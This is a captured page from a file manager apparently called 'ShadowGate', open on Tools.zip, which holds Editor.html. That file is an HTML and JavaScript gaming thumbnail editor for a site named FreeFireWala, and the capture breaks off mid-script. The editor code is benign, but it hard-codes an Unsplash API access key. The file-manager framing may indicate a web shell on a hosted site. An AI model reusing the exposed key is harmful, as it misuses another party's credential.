🗂️ ShadowGate
Path:
home
/
newsgini
/
newsgini.one
/
✏️ Editing: Tools.zip
PK o�*[�]�c) c) Editor.htmlnu �[��� <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="viewport" content="width=1024, initial-scale=0.5, maximum-scale=1"> <style> html, body { min-width: 1024px; width: 100%; overflow-x: auto; } </style> <title>Advanced Gaming Thumbnail Creator - FreeFireWala</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@100;300;400;500;700;900&family=Montserrat:wght@700&family=Bebas+Neue&family=Oswald:wght@700&family=Anton&family=Poppins:wght@700&family=Lato:wght@900&display=swap" rel="stylesheet"> <style> * { box-sizing: border-box; margin: 0; padding: 0; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; } body { background: linear-gradient(135deg, #1a1a2e 0%, #16213e 100%); color: #fff; line-height: 1.6; min-height: 100vh; display: flex; flex-direction: column; } header { background: linear-gradient(135deg, #2a2a42 0%, #1a1a2e 100%); padding: 15px 20px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.5); position: sticky; top: 0; z-index: 1000; } .header-container { max-width: 1400px; margin: 0 auto; display: flex; justify-content: space-between; align-items: center; } .header-container h1 { font-size: 2rem; color: #4cc9f0; text-shadow: 0 0 10px rgba(76, 201, 240, 0.7); } nav ul { display: flex; gap: 20px; list-style: none; } nav ul li a { color: #a9d6e5; text-decoration: none; font-weight: 500; transition: color 0.3s ease; } nav ul li a:hover { color: #f72585; } .menu-icon { display: none; font-size: 1.8rem; cursor: pointer; color: #a9d6e5; } .container { max-width: 1400px; margin: 20px auto; padding: 20px; flex: 1; } .creator-container { display: flex; flex-wrap: wrap; gap: 30px; background: rgba(30, 30, 46, 0.8); border-radius: 15px; padding: 25px; box-shadow: 0 10px 30px rgba(0, 0, 0, 0.5); backdrop-filter: blur(10px); } .preview-section { flex: 1.5; min-width: 300px; } .controls-section { flex: 1; min-width: 300px; } .canvas-container { background: #0c0c15; border-radius: 10px; overflow: hidden; position: relative; box-shadow: 0 5px 25px rgba(0, 0, 0, 0.7); border: 2px solid #4cc9f0; } #thumbnailCanvas { display: block; width: 100%; background: #131313; cursor: default; transition: transform 0.3s ease; } .canvas-overlay { position: absolute; bottom: 0; left: 0; right: 0; padding: 10px; background: rgba(0, 0, 0, 0.7); text-align: center; font-size: 0.9rem; color: #4cc9f0; display: none; } .control-group { margin-bottom: 20px; padding: 20px; background: rgba(20, 20, 35, 0.8); border-radius: 10px; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3); } .control-group h3 { margin-bottom: 15px; color: #f72585; font-size: 1.3rem; display: flex; align-items: center; gap: 10px; } .control-group h3::before { content: "•"; color: #4cc9f0; } label { display: block; margin-bottom: 8px; font-weight: 500; color: #e0e0e0; } input[type="text"], input[type="color"], input[type="number"], input[type="file"], select { width: 100%; padding: 12px; margin-bottom: 15px; border: 2px solid #2a2a42; border-radius: 8px; background: #2a2a42; color: white; transition: all 0.3s ease; } input[type="text"]:focus, input[type="color"]:focus, input[type="number"]:focus, input[type="file"]:focus, select:focus { border-color: #4cc9f0; outline: none; } input[type="range"] { width: 100%; margin-bottom: 15px; height: 8px; -webkit-appearance: none; background: #2a2a42; border-radius: 4px; } input[type="range"]::-webkit-slider-thumb { -webkit-appearance: none; width: 20px; height: 20px; border-radius: 50%; background: #4cc9f0; cursor: pointer; box-shadow: 0 0 10px rgba(76, 201, 240, 0.8); } .button-group { display: flex; gap: 15px; margin-top: 25px; flex-wrap: wrap; } button { padding: 14px 25px; border: none; border-radius: 8px; cursor: pointer; font-weight: bold; transition: all 0.3s ease; display: flex; align-items: center; justify-content: center; gap: 8px; } #generateBtn { background: linear-gradient(135deg, #4361ee 0%, #3a56d4 100%); color: white; flex: 2; } #generateBtn:hover { transform: translateY(-3px); box-shadow: 0 5px 15px rgba(67, 97, 238, 0.4); } #downloadBtn, #undoBtn, #redoBtn { background: linear-gradient(135deg, #f72585 0%, #e21c76 100%); color: white; flex: 1; } #downloadBtn:hover, #undoBtn:hover, #redoBtn:hover { transform: translateY(-3px); box-shadow: 0 5px 15px rgba(247, 37, 133, 0.4); } .range-value { display: flex; justify-content: space-between; color: #b8b8cc; margin-top: 5px; } .template-gallery { display: flex; gap: 15px; margin-top: 15px; flex-wrap: wrap; } .template { width: 80px; height: 45px; border-radius: 8px; cursor: pointer; border: 2px solid transparent; transition: all 0.2s ease; box-shadow: 0 3px 10px rgba(0, 0, 0, 0.3); } .template:hover { transform: scale(1.08); border-color: #4361ee; } .template.active { border-color: #f72585; border-width: 3px; } .error-message { color: #f72585; margin-top: -10px; margin-bottom: 10px; font-size: 0.9rem; } #unsplashResults { display: grid; grid-template-columns: repeat(auto-fill, minmax(200px, 1fr)); gap: 15px; margin-top: 15px; } #unsplashResults img { width: 100%; height: 150px; object-fit: cover; cursor: pointer; border-radius: 8px; border: 2px solid transparent; opacity: 0; transition: opacity 0.3s ease; } #unsplashResults img:hover { border-color: #4cc9f0; } #unsplashResults img.selected { border-color: #f72585; border-width: 3px; } .search-group { display: flex; gap: 10px; } .search-group input { flex: 1; } .search-group button, #loadMoreBtn, #retryBtn { padding: 12px 20px; background: linear-gradient(135deg, #4361ee 0%, #3a56d4 100%); color: white; border: none; border-radius: 8px; cursor: pointer; font-weight: bold; } #loadMoreBtn, #retryBtn { margin-top: 15px; width: 100%; display: none; } .loading-spinner { display: none; margin: 20px auto; width: 40px; height: 40px; border: 5px solid #4cc9f0; border-top: 5px solid transparent; border-radius: 50%; animation: spin 1s linear infinite; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } .position-buttons { display: flex; gap: 10px; flex-wrap: wrap; margin-top: 15px; } .position-buttons button { background: linear-gradient(135deg, #6b7280 0%, #4b5563 100%); color: white; padding: 10px; flex: 1; min-width: 100px; } .position-buttons button:hover { transform: translateY(-3px); box-shadow: 0 5px 15px rgba(107, 114, 128, 0.4); } footer { background: linear-gradient(135deg, #2a2a42 0%, #1a1a2e 100%); padding: 20px; text-align: center; margin-top: auto; } .footer-container { max-width: 1400px; margin: 0 auto; } .footer-container p { color: #a9d6e5; margin-bottom: 10px; } .footer-container ul { display: flex; justify-content: center; gap: 20px; list-style: none; } .footer-container ul li a { color: #a9d6e5; text-decoration: none; font-weight: 500; transition: color 0.3s ease; } .footer-container ul li a:hover { color: #f72585; } @media (max-width: 768px) { .header-container { flex-direction: row; align-items: center; } nav ul { display: none; flex-direction: column; gap: 10px; background: #2a2a42; position: absolute; top: 60px; right: 20px; padding: 10px; border-radius: 8px; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5); } nav ul.show { display: flex; } .menu-icon { display: block; } .creator-container { flex-direction: column; } .button-group { flex-direction: column; } #unsplashResults { grid-template-columns: repeat(auto-fill, minmax(150px, 1fr)); } #unsplashResults img { height: 120px; } } @media (min-width: 769px) { nav ul { display: flex !important; } .menu-icon { display: none; } } </style> </head> <body> <header> <div class="header-container"> <h1>FreeFireWala</h1> <nav> <ul> <li><a href="https://freefirewala.com/" title="Go to homepage">Home</a></li> <li><a href="https://freefirewala.com/about-us/" title="Learn about us">About</a></li> <li><a href="https://freefirewala.com/contact-us/" title="Get in touch">Contact</a></li> <li><a href="https://freefirewala.com/privacy-policy/" title="View privacy policy">Privacy Policy</a></li> <li><a href="https://freefirewala.com/terms-and-conditions/" title="View terms of service">Terms of Service</a></li> </ul> </nav> <i class="fas fa-bars menu-icon" title="Toggle menu"></i> </div> </header> <div class="container"> <div class="creator-container"> <div class="preview-section"> <div class="canvas-container"> <canvas id="thumbnailCanvas" width="1280" height="720"></canvas> <div class="canvas-overlay">Drag text to move • Use rotation sliders to adjust angle • Zoom for precision</div> </div> <div class="control-group"> <h3>Canvas Controls</h3> <label for="canvasZoom">Canvas Zoom</label> <input type="range" id="canvasZoom" min="0.5" max="2" step="0.1" value="1" title="Adjust canvas zoom level"> <div class="range-value"><span>0.5x</span><span id="canvasZoomValue">1x</span><span>2x</span></div> </div> <div class="control-group"> <h3>Rotation Controls</h3> <label for="mainTextRotation">Main Text Rotation (degrees)</label> <input type="range" id="mainTextRotation" min="-180" max="180" value="0" title="Rotate main text"> <div class="range-value"><span>-180</span><span id="mainTextRotationValue">0</span><span>180</span></div> <label for="secondaryTextRotation">Secondary Text Rotation (degrees)</label> <input type="range" id="secondaryTextRotation" min="-180" max="180" value="0" title="Rotate secondary text"> <div class="range-value"><span>-180</span><span id="secondaryTextRotationValue">0</span><span>180</span></div> </div> <div class="control-group"> <h3>Unsplash Image Search</h3> <div class="search-group"> <input type="text" id="unsplashSearch" placeholder="Search Unsplash for images..." title="Enter search term for Unsplash images"> <button id="searchUnsplashBtn" title="Search Unsplash"><i class="fas fa-search"></i> Search</button> </div> <div class="loading-spinner" id="loadingSpinner"></div> <div id="unsplashResults" class="template-gallery"></div> <button id="loadMoreBtn" title="Load more Unsplash images">Load More</button> <button id="retryBtn" title="Retry Unsplash search">Retry Search</button> <div class="error-message" id="bgImageError"></div> </div> </div> <div class="controls-section"> <div class="control-group"> <h3>Text Options</h3> <label for="mainText">Main Text</label> <input type="text" id="mainText" value="NEW GAMEPLAY" placeholder="Enter main text" title="Enter main text content"> <label for="mainTextColor">Main Text Color</label> <input type="color" id="mainTextColor" value="#ff0000" title="Choose main text color"> <label for="mainTextStyle">Main Text Style</label> <select id="mainTextStyle" title="Select main text style"> <option value="impact-bold">Impact Bold</option> <option value="arial-black">Arial Black</option> <option value="roboto-bold">Roboto Bold</option> <option value="montserrat-bold">Montserrat Bold</option> <option value="bebas-neue">Bebas Neue</option> <option value="oswald-bold">Oswald Bold</option> <option value="anton">Anton</option> <option value="poppins-bold">Poppins Bold</option> <option value="lato-bold">Lato Bold</option> <option value="impact-glow">Impact with Glow</option> <option value="arial-shadow">Arial with Shadow</option> <option value="roboto-gradient">Roboto Gradient</option> <option value="montserrat-stroke">Montserrat Thick Stroke</option> <option value="bebas-neon">Bebas Neue Neon</option> <option value="oswald-double-stroke">Oswald Double Stroke</option> <option value="anton-shadow">Anton Shadow</option> <option value="poppins-glow">Poppins Glow</option> <option value="lato-gradient">Lato Gradient</option> <option value="impact-outline">Impact Outline Only</option> <option value="roboto-neon">Roboto Neon</option> </select> <label for="mainTextSize">Main Text Size</label> <input type="range" id="mainTextSize" min="20" max="100" value="60" title="Adjust main text size"> <div class="range-value"><span>20</span><span id="mainTextSizeValue">60</span><span>100</span></div> <label for="mainTextBold">Main Text Bold Intensity</label> <input type="range" id="mainTextBold" min="100" max="900" step="100" value="700" title="Adjust main text bold intensity"> <div class="range-value"><span>100</span><span id="mainTextBoldValue">700</span><span>900</span></div> <label for="mainTextNeon">Main Text Neon Effect</label> <input type="range" id="mainTextNeon" min="0" max="50" value="0" title="Adjust main text neon effect"> <div class="range-value"><span>0</span><span id="mainTextNeonValue">0</span><span>50</span></div> <label for="mainTextStroke">Main Text Stroke Width</label> <input type="range" id="mainTextStroke" min="0" max="20" value="8" title="Adjust main text stroke width"> <div class="range-value"><span>0</span><span id="mainTextStrokeValue">8</span><span>20</span></div> <label for="mainTextShadowColor">Main Text Shadow Color</label> <input type="color" id="mainTextShadowColor" value="#4cc9f0" title="Choose main text shadow color for neon/glow"> <label for="secondaryText">Secondary Text</label> <input type="text" id="secondaryText" value="EPIC BATTLE!" placeholder="Enter secondary text" title="Enter secondary text content"> <label for="secondaryTextColor">Secondary Text Color</label> <input type="color" id="secondaryTextColor" value="#ffffff" title="Choose secondary text color"> <label for="secondaryTextStyle">Secondary Text Style</label> <select id="secondaryTextStyle" title="Select secondary text style"> <option value="impact-bold">Impact Bold</option> <option value="arial-black">Arial Black</option> <option value="roboto-bold">Roboto Bold</option> <option value="montserrat-bold">Montserrat Bold</option> <option value="bebas-neue">Bebas Neue</option> <option value="oswald-bold">Oswald Bold</option> <option value="anton">Anton</option> <option value="poppins-bold">Poppins Bold</option> <option value="lato-bold">Lato Bold</option> <option value="impact-glow">Impact with Glow</option> <option value="arial-shadow">Arial with Shadow</option> <option value="roboto-gradient">Roboto Gradient</option> <option value="montserrat-stroke">Montserrat Thick Stroke</option> <option value="bebas-neon">Bebas Neue Neon</option> <option value="oswald-double-stroke">Oswald Double Stroke</option> <option value="anton-shadow">Anton Shadow</option> <option value="poppins-glow">Poppins Glow</option> <option value="lato-gradient">Lato Gradient</option> <option value="impact-outline">Impact Outline Only</option> <option value="roboto-neon">Roboto Neon</option> </select> <label for="secondaryTextSize">Secondary Text Size</label> <input type="range" id="secondaryTextSize" min="15" max="80" value="40" title="Adjust secondary text size"> <div class="range-value"><span>15</span><span id="secondaryTextSizeValue">40</span><span>80</span></div> <label for="secondaryTextBold">Secondary Text Bold Intensity</label> <input type="range" id="secondaryTextBold" min="100" max="900" step="100" value="700" title="Adjust secondary text bold intensity"> <div class="range-value"><span>100</span><span id="secondaryTextBoldValue">700</span><span>900</span></div> <label for="secondaryTextNeon">Secondary Text Neon Effect</label> <input type="range" id="secondaryTextNeon" min="0" max="50" value="0" title="Adjust secondary text neon effect"> <div class="range-value"><span>0</span><span id="secondaryTextNeonValue">0</span><span>50</span></div> <label for="secondaryTextStroke">Secondary Text Stroke Width</label> <input type="range" id="secondaryTextStroke" min="0" max="20" value="6" title="Adjust secondary text stroke width"> <div class="range-value"><span>0</span><span id="secondaryTextStrokeValue">6</span><span>20</span></div> <label for="secondaryTextShadowColor">Secondary Text Shadow Color</label> <input type="color" id="secondaryTextShadowColor" value="#ffffff" title="Choose secondary text shadow color for neon/glow"> <div class="position-buttons"> <button onclick="setTextPosition('main', 'top-left')" title="Move main text to top-left">Main Top-Left</button> <button onclick="setTextPosition('main', 'center')" title="Move main text to center">Main Center</button> <button onclick="setTextPosition('main', 'bottom-right')" title="Move main text to bottom-right">Main Bottom-Right</button> <button onclick="setTextPosition('secondary', 'top-left')" title="Move secondary text to top-left">Secondary Top-Left</button> <button onclick="setTextPosition('secondary', 'center')" title="Move secondary text to center">Secondary Center</button> <button onclick="setTextPosition('secondary', 'bottom-right')" title="Move secondary text to bottom-right">Secondary Bottom-Right</button> </div> </div> <div class="control-group"> <h3>Background Options</h3> <label for="bgColor">Background Color</label> <input type="color" id="bgColor" value="#000000" title="Choose background color"> <label for="bgImageFile">Upload Local Background Image</label> <input type="file" id="bgImageFile" accept="image/*" title="Upload a local image"> <label for="overlayColor">Overlay Color</label> <input type="color" id="overlayColor" value="#000000" title="Choose overlay color"> <label for="overlayOpacity">Overlay Opacity</label> <input type="range" id="overlayOpacity" min="0" max="1" step="0.1" value="0.5" title="Adjust overlay opacity"> <div class="range-value"><span>0</span><span id="overlayOpacityValue">0.5</span><span>1</span></div> </div> <div class="control-group"> <h3>Quick Templates</h3> <div class="template-gallery"> <div class="template active" style="background: linear-gradient(135deg, #ff0000, #000000);" data-template="red-dark"></div> <div class="template" style="background: linear-gradient(135deg, #00ff00, #000000);" data-template="green-dark"></div> <div class="template" style="background: linear-gradient(135deg, #0000ff, #000000);" data-template="blue-dark"></div> <div class="template" style="background: linear-gradient(135deg, #ff9900, #000000);" data-template="orange-dark"></div> <div class="template" style="background: linear-gradient(135deg, #ff00ff, #000000);" data-template="pink-dark"></div> </div> </div> <div class="button-group"> <button id="generateBtn" title="Update thumbnail preview"><i class="fas fa-sync-alt"></i> Update Thumbnail</button> <button id="downloadBtn" title="Download thumbnail as PNG"><i class="fas fa-download"></i> Download</button> <button id="undoBtn" title="Undo last change"><i class="fas fa-undo"></i> Undo</button> <button id="redoBtn" title="Redo last change"><i class="fas fa-redo"></i> Redo</button> </div> </div> </div> </div> <footer> <div class="footer-container"> <p>© 2025 <a href="https://FreeFirewala.com" title="Visit FreeFireWala">FreeFireWala</a>. All rights reserved.</p> <ul> <li><a href="https://freefirewala.com/" title="Go to homepage">Home</a></li> <li><a href="https://freefirewala.com/about-us/" title="Learn about us">About</a></li> <li><a href="https://freefirewala.com/contact-us/" title="Get in touch">Contact</a></li> <li><a href="https://freefirewala.com/privacy-policy/" title="View privacy policy">Privacy Policy</a></li> <li><a href="https://freefirewala.com/terms-and-conditions/" title="View terms of service">Terms of Service</a></li> </ul> </div> </footer> <script> (function() { // State const state = { textObjects: { main: { text: "NEW GAMEPLAY", x: 1280 / 2, y: 720 / 2 - 50, fontSize: 60, color: "#ff0000", rotation: 0, style: "impact-bold", bold: 700, neon: 0, stroke: 8, shadowColor: "#4cc9f0" }, secondary: { text: "EPIC BATTLE!", x: 1280 / 2, y: 720 / 2 + 50, fontSize: 40, color: "#ffffff", rotation: 0, style: "impact-bold", bold: 700, neon: 0, stroke: 6, shadowColor: "#ffffff" } }, bgColor: "#000000", overlayColor: "#000000", overlayOpacity: 0.5, currentImage: null, zoom: 1, history: [], historyIndex: -1, unsplashPage: 1, unsplashQuery: "" }; // DOM elements const elements = { canvas: document.getElementById('thumbnailCanvas'), mainTextInput: document.getElementById('mainText'), mainTextColorInput: document.getElementById('mainTextColor'), mainTextStyleInput: document.getElementById('mainTextStyle'), mainTextSizeInput: document.getElementById('mainTextSize'), mainTextSizeValue: document.getElementById('mainTextSizeValue'), mainTextRotationInput: document.getElementById('mainTextRotation'), mainTextRotationValue: document.getElementById('mainTextRotationValue'), mainTextBoldInput: document.getElementById('mainTextBold'), mainTextBoldValue: document.getElementById('mainTextBoldValue'), mainTextNeonInput: document.getElementById('mainTextNeon'), mainTextNeonValue: document.getElementById('mainTextNeonValue'), mainTextStrokeInput: document.getElementById('mainTextStroke'), mainTextStrokeValue: document.getElementById('mainTextStrokeValue'), mainTextShadowColorInput: document.getElementById('mainTextShadowColor'), secondaryTextInput: document.getElementById('secondaryText'), secondaryTextColorInput: document.getElementById('secondaryTextColor'), secondaryTextStyleInput: document.getElementById('secondaryTextStyle'), secondaryTextSizeInput: document.getElementById('secondaryTextSize'), secondaryTextSizeValue: document.getElementById('secondaryTextSizeValue'), secondaryTextRotationInput: document.getElementById('secondaryTextRotation'), secondaryTextRotationValue: document.getElementById('secondaryTextRotationValue'), secondaryTextBoldInput: document.getElementById('secondaryTextBold'), secondaryTextBoldValue: document.getElementById('secondaryTextBoldValue'), secondaryTextNeonInput: document.getElementById('secondaryTextNeon'), secondaryTextNeonValue: document.getElementById('secondaryTextNeonValue'), secondaryTextStrokeInput: document.getElementById('secondaryTextStroke'), secondaryTextStrokeValue: document.getElementById('secondaryTextStrokeValue'), secondaryTextShadowColorInput: document.getElementById('secondaryTextShadowColor'), bgColorInput: document.getElementById('bgColor'), unsplashSearchInput: document.getElementById('unsplashSearch'), searchUnsplashBtn: document.getElementById('searchUnsplashBtn'), unsplashResults: document.getElementById('unsplashResults'), loadMoreBtn: document.getElementById('loadMoreBtn'), retryBtn: document.getElementById('retryBtn'), loadingSpinner: document.getElementById('loadingSpinner'), bgImageFileInput: document.getElementById('bgImageFile'), overlayColorInput: document.getElementById('overlayColor'), overlayOpacityInput: document.getElementById('overlayOpacity'), overlayOpacityValue: document.getElementById('overlayOpacityValue'), canvasZoomInput: document.getElementById('canvasZoom'), canvasZoomValue: document.getElementById('canvasZoomValue'), generateBtn: document.getElementById('generateBtn'), downloadBtn: document.getElementById('downloadBtn'), undoBtn: document.getElementById('undoBtn'), redoBtn: document.getElementById('redoBtn'), templates: document.querySelectorAll('.template'), errorContainer: document.getElementById('bgImageError') }; // Canvas setup const canvasWidth = 1280; const canvasHeight = 720; const ctx = elements.canvas.getContext('2d'); const offscreenCanvas = document.createElement('canvas'); offscreenCanvas.width = canvasWidth; offscreenCanvas.height = canvasHeight; const offscreenCtx = offscreenCanvas.getContext('2d'); // Interaction state let activeText = null; let isDragging = false; let lastX, lastY; // Unsplash API key - Replace with your own key from https://unsplash.com/developers const UNSPLASH_ACCESS_KEY = 'LQO_HiDn0i3hdgaE3vdf76pAxcrdopA_p8JBEWISNUg'; // Load saved state function loadState() { const savedState = localStorage.getItem('thumbnailCreatorState'); if (savedState) { const parsed = JSON.parse(savedState); Object.assign(state.textObjects.main, parsed.textObjects?.main || {}); Object.assign(state.textObjects.secondary, parsed.textObjects?.secondary || {}); state.bgColor = parsed.bgColor || state.bgColor; state.overlayColor = parsed.overlayColor || state.overlayColor; state.overlayOpacity = parsed.overlayOpacity || state.overlayOpacity; state.currentImage = parsed.currentImage || null; state.zoom = parsed.zoom || 1; // Update DOM elements.mainTextInput.value = state.textObjects.main.text; elements.mainTextColorInput.value = state.textObjects.main.color; elements.mainTextStyleInput.value = state.textObjects.main.style; elements.mainTextSizeInput.value = state.textObjects.main.fontSize; elements.mainTextSizeValue.textContent = state.textObjects.main.fontSize; elements.mainTextRotationInput.value = state.textObjects.main.rotation * 180 / Math.PI; elements.mainTextRotationValue.textContent = elements.mainTextRotationInput.value; elements.mainTextBoldInput.value = state.textObjects.main.bold; elements.mainTextBoldValue.textContent = state.textObjects.main.bold; elements.mainTextNeonInput.value = state.textObjects.main.neon; elements.mainTextNeonValue.textContent = state.textObjects.main.neon; elements.mainTextStrokeInput.value = state.textObjects.main.stroke; elements.mainTextStrokeValue.textContent = state.textObjects.main.stroke; elements.mainTextShadowColorInput.value = state.textObjects.main.shadowColor; elements.secondaryTextInput.value = state.textObjects.secondary.text; elements.secondaryTextColorInput.value = state.textObjects.secondary.color; elements.secondaryTextStyleInput.value = state.textObjects.secondary.style; elements.secondaryTextSizeInput.value = state.textObjects.secondary.fontSize; elements.secondaryTextSizeValue.textContent = state.textObjects.secondary.fontSize; elements.secondaryTextRotationInput.value = state.textObjects.secondary.rotation * 180 / Math.PI; elements.secondaryTextRotationValue.textContent = elements.secondaryTextRotationInput.value; elements.secondaryTextBoldInput.value = state.textObjects.secondary.bold; elements.secondaryTextBoldValue.textContent = state.textObjects.secondary.bold; elements.secondaryTextNeonInput.value = state.textObjects.secondary.neon; elements.secondaryTextNeonValue.textContent = state.textObjects.secondary.neon; elements.secondaryTextStrokeInput.value = state.textObjects.secondary.stroke; elements.secondaryTextStrokeValue.textContent = state.textObjects.secondary.stroke; elements.secondaryTextShadowColorInput.value = state.textObjects.secondary.shadowColor; elements.bgColorInput.value = state.bgColor; elements.overlayColorInput.value = state.overlayColor; elements.overlayOpacityInput.value = state.overlayOpacity; elements.overlayOpacityValue.textContent = state.overlayOpacity; elements.canvasZoomInput.value = state.zoom; elements.canvasZoomValue.textContent = state.zoom + 'x'; } } // Save state function saveState() { localStorage.setItem('thumbnailCreatorState', JSON.stringify({ textObjects: state.textObjects, bgColor: state.bgColor, overlayColor: state.overlayColor, overlayOpacity: state.overlayOpacity, currentImage: state.currentImage, zoom: state.zoom })); } // Save history function saveHistory() { state.history = state.history.slice(0, state.historyIndex + 1); state.history.push(JSON.parse(JSON.stringify({ textObjects: state.textObjects, bgColor: state.bgColor, overlayColor: state.overlayColor, overlayOpacity: state.overlayOpacity, currentImage: state.currentImage, zoom: state.zoom }))); state.historyIndex++; updateUndoRedoButtons(); saveState(); } // Undo/Redo function undo() { if (state.historyIndex > 0) { state.historyIndex--; applyHistoryState(); } } function redo() { if (state.historyIndex < state.history.length - 1) { state.historyIndex++; applyHistoryState(); } } function applyHistoryState() { const historyState = state.history[state.historyIndex]; Object.assign(state.textObjects.main, historyState.textObjects.main); Object.assign(state.textObjects.secondary, historyState.textObjects.secondary); state.bgColor = historyState.bgColor; state.overlayColor = historyState.overlayColor; state.overlayOpacity = historyState.overlayOpacity; state.currentImage = historyState.currentImage; state.zoom = historyState.zoom; // Update DOM elements.mainTextInput.value = state.textObjects.main.text; elements.mainTextColorInput.value = state.textObjects.main.color; elements.mainTextStyleInput.value = state.textObjects.main.style; elements.mainTextSizeInput.value = state.textObjects.main.fontSize; elements.mainTextSizeValue.textContent = state.textObjects.main.fontSize; elements.mainTextRotationInput.value = state.textObjects.main.rotation * 180 / Math.PI; elements.mainTextRotationValue.textContent = elements.mainTextRotationInput.value; elements.mainTextBoldInput.value = state.textObjects.main.bold; elements.mainTextBoldValue.textContent = state.textObjects.main.bold; elements.mainTextNeonInput.value = state.textObjects.main.neon; elements.mainTextNeonValue.textContent = state.textObjects.main.neon; elements.mainTextStrokeInput.value = state.textObjects.main.stroke; elements.mainTextStrokeValue.textContent = state.textObjects.main.stroke; elements.mainTextShadowColorInput.value = state.textObjects.main.shadowColor; elements.secondaryTextInput.value = state.textObjects.secondary.text; elements.secondaryTextColorInput.value = state.textObjects.secondary.color; elements.secondaryTextStyleInput.value = state.textObjects.secondary.style; elements.secondaryTextSizeInput.value = state.textObjects.secondary.fontSize; elements.secondaryTextSizeValue.textContent = state.textObjects.secondary.fontSize; elements.secondaryTextRotationInput.value = state.textObjects.secondary.rotation * 180 / Math.PI; elements.secondaryTextRotationValue.textContent = elements.secondaryTextRotationInput.value; elements.secondaryTextBoldInput.value = state.textObjects.secondary.bold; elements.secondaryTextBoldValue.textContent = state.textObjects.secondary.bold; elements.secondaryTextNeonInput.value = state.textObjects.secondary.neon; elements.secondaryTextNeonValue.textContent = state.textObjects.secondary.neon; elements.secondaryTextStrokeInput.value = state.textObjects.secondary.stroke; elements.secondaryTextStrokeValue.textContent = state.textObjects.secondary.stroke; elements.secondaryTextShadowColorInput.value = state.textObjects.secondary.shadowColor; elements.bgColorInput.value = state.bgColor; elements.overlayColorInput.value = state.overlayColor; elements.overlayOpacityInput.value = state.overlayOpacity; elements.overlayOpacityValue.textContent = state.overlayOpacity; elements.canvasZoomInput.value = state.zoom; elements.canvasZoomValue.textContent = state.zoom + 'x'; updateUndoRedoButtons(); drawThumbnail(); } function updateUndoRedoButtons() { elements.undoBtn.disabled = state.historyIndex <= 0; elements.redoBtn.disabled = state.historyIndex >= state.history.length - 1; } // Initialize canvas size function initCanvas() { elements.canvas.width = canvasWidth; elements.canvas.height = canvasHeight; updateCanvasSize(); } function updateCanvasSize() { const displayWidth = elements.canvas.clientWidth; const scale = displayWidth / canvasWidth; elements.canvas.style.height = (canvasHeight * scale * state.zoom) + 'px'; elements.canvas.style.transform = `scale(${state.zoom})`; elements.canvas.style.transformOrigin = 'top left'; } // Apply text style function applyTextStyle(context, text, key) { const fontSize = text.fontSize; const color = text.color; const bold = text.bold; const neon = text.neon; const stroke = text.stroke; const shadowColor = text.shadowColor; let fontFamily = 'Impact'; let strokeColor = '#000'; let shadowBlur = neon; let shadowOffsetX = 0; let shadowOffsetY = 0; let fillStyle = color; switch(text.style) { case 'impact-bold': fontFamily = 'Impact'; break; case 'arial-black': fontFamily = 'Arial Black'; break; case 'roboto-bold': fontFamily = 'Roboto'; break; case 'montserrat-bold': fontFamily = 'Montserrat'; break; case 'bebas-neue': fontFamily = 'Bebas Neue'; break; case 'oswald-bold': fontFamily = 'Oswald'; break; case 'anton': fontFamily = 'Anton'; break; case 'poppins-bold': fontFamily = 'Poppins'; break; case 'lato-bold': fontFamily = 'Lato'; break; case 'impact-glow': fontFamily = 'Impact'; shadowBlur = neon || 15; break; case 'arial-shadow': fontFamily = 'Arial Black'; shadowOffsetX = 5; shadowOffsetY = 5; break; case 'roboto-gradient': fontFamily = 'Roboto'; const gradient = context.createLinearGradient(0, -fontSize/2, 0, fontSize/2); gradient.addColorStop(0, color); gradient.addColorStop(1, '#ffffff'); fillStyle = gradient; break; case 'montserrat-stroke': fontFamily = 'Montserrat'; strokeColor = '#f72585'; break; case 'bebas-neon': fontFamily = 'Bebas Neue'; shadowBlur = neon || 20; strokeColor = '#f72585'; break; case 'oswald-double-stroke': fontFamily = 'Oswald'; context.strokeStyle = '#000'; context.strokeText(text.text, 0, 0); strokeColor = '#4cc9f0'; break; case 'anton-shadow': fontFamily = 'Anton'; shadowOffsetX = 8; shadowOffsetY = 8; break; case 'poppins-glow': fontFamily = 'Poppins'; shadowBlur = neon || 10; break; case 'lato-gradient': fontFamily = 'Lato'; const gradient2 = context.createLinearGradient(0, -fontSize/2, 0, fontSize/2); gradient2.addColorStop(0, '#ff00ff'); gradient2.addColorStop(1, color); fillStyle = gradient2; break; case 'impact-outline': fontFamily = 'Impact'; fillStyle = 'transparent'; strokeColor = color; break; case 'roboto-neon': fontFamily = 'Roboto'; shadowBlur = neon || 25; strokeColor = color; break; } context.font = `${bold} ${fontSize}px ${fontFamily}, sans-serif`; context.fillStyle = fillStyle; context.strokeStyle = strokeColor; context.lineWidth = stroke; context.shadowColor = shadowColor; context.shadowBlur = shadowBlur; context.shadowOffsetX = shadowOffsetX; context.shadowOffsetY = shadowOffsetY; } // Load image function loadImage(source) { return new Promise((resolve, reject) => { if (!source || !source.value) { reject(new Error('No image source provided')); return; } const img = new Image(); img.crossOrigin = 'anonymous'; img.src = source.value; img.onload = () => resolve(img); img.onerror = () => reject(new Error(`Failed to load ${source.type === 'data' ? 'local' : 'Unsplash'} image`)); }); } // Draw on canvas function drawOnCanvas(context, width, height, showBoundingBox = true, callback = () => {}) { elements.loadingSpinner.style.display = 'block'; context.clearRect(0, 0, width, height); context.fillStyle = state.bgColor; context.fillRect(0, 0, width, height); const drawOverlayAndText = (img = null) => { if (img) { context.drawImage(img, 0, 0, width, height); } context.fillStyle = state.overlayColor; context.globalAlpha = state.overlayOpacity; context.fillRect(0, 0, width, height); context.globalAlpha = 1; for (const key in state.textObjects) { const text = state.textObjects[key]; context.save(); context.translate(text.x, text.y); context.rotate(text.rotation); context.textAlign = 'center'; context.textBaseline = 'middle'; applyTextStyle(context, text, key); context.strokeText(text.text, 0, 0); context.fillText(text.text, 0, 0); if (showBoundingBox && key === activeText) { const metrics = context.measureText(text.text); const textWidth = metrics.width; const textHeight = text.fontSize; const padding = 20; context.strokeStyle = '#4cc9f0'; context.lineWidth = 2; context.strokeRect(-textWidth/2 - padding, 